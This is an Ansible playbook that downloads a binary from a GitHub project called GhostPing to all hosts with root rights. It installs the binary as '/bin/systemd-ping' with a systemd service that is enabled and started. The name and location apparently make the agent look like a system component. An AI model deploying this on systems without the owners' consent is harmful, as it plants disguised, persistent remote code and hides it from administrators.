- name: Linux Deploy Playbook
  hosts: all
  become: yes
  vars:
    linux_path: /bin
    agent_name: systemd-ping
    service_file: /lib/systemd/system/systemd-ping.service
    agent_url: https://github.com/miller-js/GhostPing/releases/download/v2.0.0/systemd-ping
    service_url: https://raw.githubusercontent.com/miller-js/GhostPing/refs/heads/main/deploy/client.service

  tasks:
    - name: Ensure target is Linux
      fail:
        msg: "This playbook only supports Linux hosts"
      when: ansible_system != "Linux"

    - name: Download agent binary
      get_url:
        url: "{{ agent_url }}"
        dest: "{{ linux_path }}/{{ agent_name }}"
        mode: '0755'

    - name: Download systemd service file
      get_url:
        url: "{{ service_url }}"
        dest: "{{ service_file }}"
        mode: '0644'

    - name: Configure ExecStart in service file
      ansible.builtin.lineinfile:
        path: "{{ service_file }}"
        regexp: '^ExecStart='
        line: "ExecStart={{ linux_path }}/{{ agent_name }}"

    - name: Reload systemd
      systemd:
        daemon_reload: yes

    - name: Enable and start service
      systemd:
        name: "{{ agent_name }}"
        enabled: yes
        state: started
